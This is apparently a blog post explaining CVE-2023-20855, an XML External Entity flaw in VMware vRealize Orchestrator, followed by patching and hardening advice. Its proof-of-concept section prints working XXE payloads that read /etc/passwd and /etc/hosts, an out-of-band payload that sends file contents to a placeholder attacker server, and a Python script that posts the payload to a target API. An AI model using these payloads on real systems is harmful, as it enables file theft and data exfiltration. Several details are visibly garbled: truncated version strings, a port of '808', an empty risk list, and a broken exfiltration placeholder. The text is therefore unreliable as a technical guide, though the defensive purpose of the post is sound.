CVE-2023-20855 - How an XXE Bug in VMware vRealize Orchestrator Opens Doors for Attackers

TL;DR:  
A security vulnerability (CVE-2023-20855) was discovered in VMware vRealize Orchestrator, allowing attackers with basic access to potentially steal secrets or escalate privileges using a classic XML External Entity (XXE) attack. In this article, we’ll break down what happened, show you how XXE works, and walk through an example exploit step by step.

What is CVE-2023-20855?

In March 2023, VMware published an advisory for a security hole in vRealize Orchestrator (vRO), a workflow automation tool. Normally, vRO tries hard to be safe with XML input, but researchers found a way to sneak dangerous data past its guards.

Who’s at risk?  
If you use vRealize Orchestrator (versions 8.x and earlier, before the patch) and you let users submit workflow inputs, an attacker could use this flaw to:

What’s an XXE Vulnerability?

An XML External Entity (XXE) attack abuses the way some XML parsers handle special instructions embedded in XML. If the parser is not correctly locked down, attackers can “trick” it into loading data from local files, remote servers, or even system variables.

It’s sort of like letting a visitor into your house — except, when they ask where the bathroom is, they find the front door leads right into your vault.

The Heart of the Exploit

Suppose you have a vRO workflow that takes XML input (say, for automation tasks). Under the hood, the workflow engine parses the XML to build data objects. If the parser doesn’t block external DTDs (Document Type Definitions), an attacker can submit XML like this:

<?xml version="1."?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <info>&xxe;</info>
</data>

What happens?
When the XML is parsed, &xxe; is replaced with the contents of /etc/passwd (the UNIX user list file) or any other file the process can read.

Now imagine what happens if the attacker asks for sensitive files: secret keys, credentials, or even cloud metadata!

Proof of Concept: Exploiting CVE-2023-20855

Here’s a basic walkthrough for testing the vulnerability (on your *own* safe lab, not in production!).

1. Send a Malicious Request

Assume you have workflow access with XML input (could be via API or UI).

Create a payload like

<?xml version="1."?>
<!DOCTYPE replace [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<input>
  <username>&xxe;</username>
</input>

Submit or inject the above XML.

- If the workflow’s response or logs display the parsed input, you should see /etc/passwd contents appear.

Alternatively, use a URL to *exfiltrate* data

<?xml version="1."?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "http://YOUR-ATTACKER-SERVER/?leak=%2FILE%">;
]>
<test>&xxe;</test>

Spin up a web server (python3 -m http.server 808) and receive the request revealing file contents.

You can automate the XXE test using Python’s requests library

import requests

xml_payload = '''
<?xml version="1."?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<data>
  <info>&xxe;</info>
</data>
'''

url = "https://vro-vulnerable-server/api/workflows/submit";
headers = { "Content-Type": "application/xml" }
r = requests.post(url, data=xml_payload, headers=headers, verify=False)
print(r.text)

*PS: Make sure you have legal authorization before testing anything!*

What Should You Do?

- Patch ASAP: Update to the latest vRealize Orchestrator (see VMware’s security advisory).
- Sanitize Inputs: Always treat XML from untrusted users as dangerous—validate and restrict what gets parsed.
- Check for XXE Support: Disable DTDs and external entity resolution in your parsers whenever possible.
- Review Workflow Design: Don’t allow non-admins to create or run workflows with “raw” XML input unless you’re sure they’re harmless.

Resources and References

- VMware vRealize Orchestrator Security Advisory (VMSA-2023-0005)
- Common XXE Attack Cheat Sheet (OWASP)
- XML External Entity (XXE) Attack explained on PortSwigger

In Conclusion

CVE-2023-20855 is a textbook reminder: If you’re taking in user XML anywhere in your environment, *assume* someone will try to break in through an XXE attack. This time, it was VMware’s high-profile automation suite, but the lesson applies everywhere.

Keep your software patched, keep XML locked down.

Stay alert—someone might be peeking at your secrets!


*This post is written for educational purposes. Always test responsibly and with proper authorization.*

Timeline

Published on: 02/22/2023 00:15:00 UTC
Last modified on: 03/03/2023 14:04:00 UTC